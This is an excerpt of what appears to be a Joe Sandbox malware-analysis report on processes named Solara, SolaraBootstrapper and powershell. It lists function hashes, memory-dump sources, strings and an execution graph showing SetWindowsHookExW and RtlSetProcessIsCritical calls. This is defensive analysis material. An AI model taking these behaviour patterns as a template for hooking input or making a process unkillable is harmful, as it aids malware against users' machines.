                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q$<l$<l
                                                                • API String ID: 0-2022801504
                                                                • Opcode ID: 524ba36b61e2846ca18d36cc76437e3ac21f45d8896ad3e71c2972aa2fb4649c
                                                                • Instruction ID: 43e91d5e09206ad0a5cf5e43ed39cf973bc94e560543f520da198010b30615ed
                                                                • Opcode Fuzzy Hash: 524ba36b61e2846ca18d36cc76437e3ac21f45d8896ad3e71c2972aa2fb4649c
                                                                • Instruction Fuzzy Hash: 9F517EF17063668FCF2896298800667BFA6AFC2214F14947BD445CF395DE39C887DB91
                                                                Function 04F67A21 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tMFl$`_q$`_q$`_q$`_q
                                                                • API String ID: 0-1369704813
                                                                • Opcode ID: 80f530eb6af369f44421595c9bc617176a8cd982ffa98e249b2af084e75ff8b9
                                                                • Instruction ID: b4c70e42fb9e8c37a1849ac5398705601365985ae5adc063d8f7a199ccf77c34
                                                                • Opcode Fuzzy Hash: 80f530eb6af369f44421595c9bc617176a8cd982ffa98e249b2af084e75ff8b9
                                                                • Instruction Fuzzy Hash: 85B1A774E012099FDB55DFA9D990A9DFBF2FF48304F108629E819AB315EB30A945CF90
                                                                Function 04F67A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tMFl$`_q$`_q$`_q$`_q
                                                                • API String ID: 0-1369704813
                                                                • Opcode ID: e932d14ee710b6f85b936a48c9fbae3dab673061dfc000450e27bc51722d15c2
                                                                • Instruction ID: 0ee948488ce3aaf8752c3cafe4259bde247c284783c49f11cf6d2f896cd3565a
                                                                • Opcode Fuzzy Hash: e932d14ee710b6f85b936a48c9fbae3dab673061dfc000450e27bc51722d15c2
                                                                • Instruction Fuzzy Hash: BBB19674E012099FDB55DFA9D990A9DFBF2FF48304F108629E819AB315EB30A945CF90
                                                                Function 04F6EDD8 Relevance: 5.5, Strings: 4, Instructions: 454COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `Q^q$$^q$$^q$$^q
                                                                • API String ID: 0-2499013975
                                                                • Opcode ID: dc40304dd412f5fa7b6aa44b7ce65265b1a96d87c2095f9a446a0e4e7a82c7bf
                                                                • Instruction ID: d5f81d0e52c1485f86ecdf111d86151abcbfb0f6cac2ddd8d59dbde1808f91ee
                                                                • Opcode Fuzzy Hash: dc40304dd412f5fa7b6aa44b7ce65265b1a96d87c2095f9a446a0e4e7a82c7bf
                                                                • Instruction Fuzzy Hash: 84E12335B401108FCB189B79A514A2E77D7AFC9B14B2544AAD903CF3A8EE71EC4387A1
                                                                Function 07E25798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731
                                                                • Opcode ID: 8e37fc8dbc6a798a52829e97adc8ee0d746f2ef664cb6c2f88054797b10eebf5
                                                                • Instruction ID: 59c5cf82acb5ebe377dc8fcac124ff75cd8ab6ae8c698c41d0703d1f9d10212f
                                                                • Opcode Fuzzy Hash: 8e37fc8dbc6a798a52829e97adc8ee0d746f2ef664cb6c2f88054797b10eebf5
                                                                • Instruction Fuzzy Hash: 582188B270232A9BDB28992A9D01F37B7D6ABC0714F24847EA505CF385DDB5C8929361
                                                                Function 07E22109 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$JGl$JGl
                                                                • API String ID: 0-3960896243
                                                                • Opcode ID: 77935b6e20e25d28995b4bb9934cd650ce9ef2ec910068edbcdf2f88cadb8804
                                                                • Instruction ID: d4de3f9f5752fffc79068a99be902b579e55450f583b7486188b9f0d63e33a9f
                                                                • Opcode Fuzzy Hash: 77935b6e20e25d28995b4bb9934cd650ce9ef2ec910068edbcdf2f88cadb8804
                                                                • Instruction Fuzzy Hash: EA01FCB170A3A14FC73642385C11CA27FB66FC265071A55D7C650DF26AC9254C49C7B2

                                                                Execution Graph

                                                                Execution Coverage:18.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:11
                                                                Total number of Limit Nodes:1
                                                                execution_graph 5338 7ffd9b693658 5339 7ffd9b693661 SetWindowsHookExW 5338->5339 5341 7ffd9b693731 5339->5341 5351 7ffd9b6914fa 5352 7ffd9b691505 RtlSetProcessIsCritical 5351->5352 5354 7ffd9b6931f2 5352->5354 5346 7ffd9b69149f 5348 7ffd9b6914cd 5346->5348 5347 7ffd9b6914db 5348->5347 5349 7ffd9b693191 RtlSetProcessIsCritical 5348->5349 5350 7ffd9b6931f2 5349->5350

                                                                Executed Functions

                                                                Function 00007FFD9B692FE8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2928671241.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID: PJ]I
                                                                • API String ID: 2695349919-2538668677
                                                                • Opcode ID: 6ceffa38af3aa9311b62d3fa7ad67a03006409454c3164f3b0ab58ace36210e3
                                                                • Instruction ID: 273bab3024e171757060bd3d9d38a4f7d9282c671188048b2eb3f06610676351
                                                                • Opcode Fuzzy Hash: 6ceffa38af3aa9311b62d3fa7ad67a03006409454c3164f3b0ab58ace36210e3
                                                                • Instruction Fuzzy Hash: 32816A72A0F6C94FF725CAAC5C661A97FE0EF51310B0800BFD0E98B1D3E929B9458341
                                                                Function 00007FFD9B69149F Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2928671241.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 565f5d71d75b14b87f9fbdc90143f6db1187d8a792901b9beb82ab478e6e370f
                                                                • Instruction ID: 3abe3bab641df58d2e398181776c07dc04e517c1648f8a3692de2f111f284e1a
                                                                • Opcode Fuzzy Hash: 565f5d71d75b14b87f9fbdc90143f6db1187d8a792901b9beb82ab478e6e370f
                                                                • Instruction Fuzzy Hash: A2514B36B089288FD714AB9DE8557E977E0FFD5322F04413FD14ACB292DA64684B87E0
                                                                Function 00007FFD9B693658 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 421 7ffd9b693658-7ffd9b69365f 422 7ffd9b69366a-7ffd9b6936dd 421->422 423 7ffd9b693661-7ffd9b693669 421->423 427 7ffd9b693769-7ffd9b69376d 422->427 428 7ffd9b6936e3-7ffd9b6936f0 422->428 423->422 429 7ffd9b6936f2-7ffd9b69372f SetWindowsHookExW 427->429 428->429 431 7ffd9b693737-7ffd9b693768 429->431 432 7ffd9b693731 429->432 432->431
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2928671241.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID: HookWindows
                                                                • String ID:
                                                                • API String ID: 2559412058-0
                                                                • Opcode ID: 5a915cf2b325e410405adbffee58d55785fa9986ac4dfa0612c333ff08b2ae61
                                                                • Instruction ID: 6793c23a3e04651f577293dfd674d80e61ae087419462256f8bacccbcfc83b55
                                                                • Opcode Fuzzy Hash: 5a915cf2b325e410405adbffee58d55785fa9986ac4dfa0612c333ff08b2ae61
                                                                • Instruction Fuzzy Hash: 52411530A1CA4D4FDB18EF6C985A6F9BBE1EB59321F00427ED059C3292CE74B81287C1

                                                                Executed Functions

                                                                Function 01310890 Relevance: .4, Instructions: 372COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ff24e279902815334b0d045800754e09d6f6ea8cc4f3101c5ac8a5f7568b890
                                                                • Instruction ID: 4dbf28214b987d141af6ff7db4b9286eb3ae681d69533b20133044988884ba8f
                                                                • Opcode Fuzzy Hash: 5ff24e279902815334b0d045800754e09d6f6ea8cc4f3101c5ac8a5f7568b890
                                                                • Instruction Fuzzy Hash: E5F12571D1122ACFDB28DF65D984BADBBB2FB89300F1091A9D449A7358DB305E85CF50
                                                                Function 01310880 Relevance: .3, Instructions: 340COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db8706a3ce7b940c301f416c022480c75a45af4780b7b8b7b0da7b7c29570c5a
                                                                • Instruction ID: ce71cfd9f801a258f26a9fdb6a913b8d19ccf6fcf636df355344896cfe4d1367
                                                                • Opcode Fuzzy Hash: db8706a3ce7b940c301f416c022480c75a45af4780b7b8b7b0da7b7c29570c5a
                                                                • Instruction Fuzzy Hash: 9BE11671D1022ACFDB28DF66D984BDDBBB2FB89300F1095AA9449A7358DB305E85CF50
                                                                Function 0131246D Relevance: .4, Instructions: 350COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92df8ea92e6ce0bc23c010cdd28462ce3f114f3f14ff81eecf47a3b01c13f7d2
                                                                • Instruction ID: 69ec8b85f7de1890c6a658b455224d3c9d5ae2014b6a72355922ed3f88d07ce0
                                                                • Opcode Fuzzy Hash: 92df8ea92e6ce0bc23c010cdd28462ce3f114f3f14ff81eecf47a3b01c13f7d2
                                                                • Instruction Fuzzy Hash: 11014634D1834AEFCB05EFB8E454A99BFB0EF4A300F2084AAD84497322EB345A41CB40
                                                                Function 01311050 Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49e06d941f69791cde25409ab5c92878584c3bb621a3c0c52f35c34d97f527c9
                                                                • Instruction ID: 885b7a931f0de3c440b0bf82b162000c7f3faf1c5b4017013bdb8b19cfbbc250
                                                                • Opcode Fuzzy Hash: 49e06d941f69791cde25409ab5c92878584c3bb621a3c0c52f35c34d97f527c9
                                                                • Instruction Fuzzy Hash: 2C41E574E11209DFDB58DFA9D880ADDBBB2BF89304F50852DE404A7358DB749846CF51
                                                                Function 0131275A Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f58c04a48cec798b798c8ce8f18cf24f4e6c8117fdb6349d224bc1161b5dde0
                                                                • Instruction ID: b06855fe9135844158841fe5ea9a1db2715f189108bffdb5df5ead0570aa764c
                                                                • Opcode Fuzzy Hash: 1f58c04a48cec798b798c8ce8f18cf24f4e6c8117fdb6349d224bc1161b5dde0
                                                                • Instruction Fuzzy Hash: 25211575E01209CFDB08DFA9D554AEEBBB2AF89304F20946AE801B7364DB319D40CF64
                                                                Function 01312768 Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90a28a8e5386eb5bc4befcc2c082e02880cbded4427f1a6c07afaedea6642a32
                                                                • Instruction ID: 312df6d673543b5cbb0345fc8606e8c0b09e1388f6ef2548dd50492d02741d51
                                                                • Opcode Fuzzy Hash: 90a28a8e5386eb5bc4befcc2c082e02880cbded4427f1a6c07afaedea6642a32
                                                                • Instruction Fuzzy Hash: 6F21D675E01209DFDB08DFA9D554ADEBBF2AF89304F20946AE801B7364DB355D40CBA4
                                                                Function 01310FC8 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54a031a1845f41d185193908701c4432c5a293ba159ab27bf09409277a970e35
                                                                • Instruction ID: 1a09d619e019dfae3b16b4433bd4ec822b9cf5040fb1c51d7edef4378ff923fe
                                                                • Opcode Fuzzy Hash: 54a031a1845f41d185193908701c4432c5a293ba159ab27bf09409277a970e35
                                                                • Instruction Fuzzy Hash: 26F0657150634ADFC701DFA8E906A8DBB74EF06304F4045E9E505DB366DB302E44D765
                                                                Function 01310FD8 Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cf0fa4ffb186401fb78dfb434938eb884158e1b1fdef25eeb62ca3a7cbcd4e27
                                                                • Instruction ID: 6d0569608172bd4ca77c89244fbde36c8d1335d5c7cf375aff2092cce5f95bd2
                                                                • Opcode Fuzzy Hash: cf0fa4ffb186401fb78dfb434938eb884158e1b1fdef25eeb62ca3a7cbcd4e27
                                                                • Instruction Fuzzy Hash: 88E04F7050120AEFC704EFA8E906E9DB7B4EB00304F8046A8E40597354DB302E4497A1

                                                                Executed Functions

                                                                Function 00007FFD9B69644D Relevance: .7, Instructions: 724COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3d2efbe7c351e3af95e59537e66bc3ab669defd63cc2870eb0f4a103f42f624
                                                                • Instruction ID: 35ac5af377325b2791dbb4f536291a1362a386ea33812e40f12d3800fc993562
                                                                • Opcode Fuzzy Hash: b3d2efbe7c351e3af95e59537e66bc3ab669defd63cc2870eb0f4a103f42f624
                                                                • Instruction Fuzzy Hash: 2AD18E31A08A4D8FDF94DF5CC464AE9BBE1FF68340F15416AD419DB2A6CA34F881CB81
                                                                Function 00007FFD9B766660 Relevance: .4, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5348f763bd9638d092818e2422ac9dedc9251a73bb2bec0461256dde89de273
                                                                • Instruction ID: 0503c0fab13ace5b1787f80df8dd19004ec9f3ee46ad723818beb72882b3cbfc
                                                                • Opcode Fuzzy Hash: a5348f763bd9638d092818e2422ac9dedc9251a73bb2bec0461256dde89de273
                                                                • Instruction Fuzzy Hash: C6C14772B0EB8E8FEBA5ABA898655B57B91EF51310F4902BED44DC70F7D914E801C342
                                                                Function 00007FFD9B57E380 Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1897938027.00007FFD9B57D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B57D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b57d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31d9393e942528b0a2824dda2d8399418faac303de3e27d39c1676a31a00ade1
                                                                • Instruction ID: c63b96c5edf1ee7bd0ca12d252e1ef6ad9d6601f1630da48bb2296052d781ecb
                                                                • Opcode Fuzzy Hash: 31d9393e942528b0a2824dda2d8399418faac303de3e27d39c1676a31a00ade1
                                                                • Instruction Fuzzy Hash: B041267150EBC84FE7A78B289895A523FF4EF52314B1641EFD088CB1A3D625B846C792
                                                                Function 00007FFD9B699788 Relevance: .1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8272dfaf580b5d7a076f35dfc6281e30570d36f8dd5f1349b770b284f47bb22
                                                                • Instruction ID: d1e8663a1372940b580f69401682c29447d56f2ea1c73ea66655fe579f64d9f3
                                                                • Opcode Fuzzy Hash: c8272dfaf580b5d7a076f35dfc6281e30570d36f8dd5f1349b770b284f47bb22
                                                                • Instruction Fuzzy Hash: E631B53091CB4C8FDB5C9B4C984A6A977E0FB99711F00422FE449D3251CA70B8558BC2
                                                                Function 00007FFD9B69A62C Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51896acb6c46fee603b7e5a6a8468f1145ab18ecb42eb11be7d208b90a9bf79f
                                                                • Instruction ID: 714188f53056d4037cccbb35e2eba67456c72971fe2337380e9048c4c624df8c
                                                                • Opcode Fuzzy Hash: 51896acb6c46fee603b7e5a6a8468f1145ab18ecb42eb11be7d208b90a9bf79f
                                                                • Instruction Fuzzy Hash: 3F21283090DB4C4FDB59DFAC984A7E97FF0EB96321F04416BD049C7192DA74A44ACB91
                                                                Function 00007FFD9B69A1F5 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d93c7d16004b425968addcfb3a0d039c20d6f041265843e3879c19b4e7f67be
                                                                • Instruction ID: a1606f27666634070c643f15eebef5342f964b0ae836284cab7d5780aeecc835
                                                                • Opcode Fuzzy Hash: 2d93c7d16004b425968addcfb3a0d039c20d6f041265843e3879c19b4e7f67be
                                                                • Instruction Fuzzy Hash: 92310B7690E68A4FD715AFAC9C724E57BE0FF2122870D02F7C0A8CE163FD1515468742
                                                                Function 00007FFD9B6933B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 1b5accfc9599bf43c69ba9d6bd2a67115dc506e1efe0f693a81a39f3d74253e9
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: B201A73020CB0C4FDB48EF0CE051AA5B3E0FB89324F10056DE58AC36A1DA32E882CB41
                                                                Function 00007FFD9B76414D Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb8bfd5e5f4c018249b0f0593d6cfddd4cd86d91d0000ded759e5383caa43c6c
                                                                • Instruction ID: 1fcf005d3356e901b4c45c193da9439ce95c501228e3f975c908073790ffb8d6
                                                                • Opcode Fuzzy Hash: eb8bfd5e5f4c018249b0f0593d6cfddd4cd86d91d0000ded759e5383caa43c6c
                                                                • Instruction Fuzzy Hash: 09F0BE32B0E6498FD768EB8CE4528E873E0EF55320B1201BAE06DC71B3CA25EC40C742
                                                                Function 00007FFD9B764400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce412540b603d3b836f16cf15b3269fa9d8eb43854e3ba2dcd7436bf3c7c6cf9
                                                                • Instruction ID: 0a1d5f0416fcb392d7fcce1aca68181f5781a9644b99c4d07cbd337be46225a8
                                                                • Opcode Fuzzy Hash: ce412540b603d3b836f16cf15b3269fa9d8eb43854e3ba2dcd7436bf3c7c6cf9
                                                                • Instruction Fuzzy Hash: 74F0BE32B0E6498FD765EB4CE0668E87BE0FF0532074200BAE05DCB0B3CA26AC40C741
                                                                Function 00007FFD9B7641D1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: c6045f471de93fd1282ca3adbf8d1de1fbb49414070c6d2fea6aaaf07c9ecea7
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: 85E01A31B0C908DFDA78DA4CE0519E973E1EB98321B1202BBD14EC7571CA22ED518B81

                                                                Non-executed Functions

                                                                Function 00007FFD9B698BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                • API String ID: 0-3508309026
                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction ID: 7573f7cc0f08f889b6fda03452d193ae9225bc5c6eed64408cc2b2fddd6c9c2d
                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction Fuzzy Hash: B42104B7B080254ED3057BBCAC249DA3B40DF9477478942B2D2A9CF183ED24708B8AC2

                                                                Executed Functions

                                                                Function 00007FFD9B691679 Relevance: .8, Instructions: 847COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b233e89752e02575d9b8fd6018433b218da37517f0ece8033615b117ba1a507e
                                                                • Instruction ID: ea4fedb506264e21d4016142f313fc38934c3b5f43a0ed061cd2822ab555b892
                                                                • Opcode Fuzzy Hash: b233e89752e02575d9b8fd6018433b218da37517f0ece8033615b117ba1a507e
                                                                • Instruction Fuzzy Hash: 5542E561B1DA494FE7A8EB6C8475AB977D2FF98300F5405BDE01EC72D6DE28B8018781
                                                                Function 00007FFD9B6916B9 Relevance: .7, Instructions: 675COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
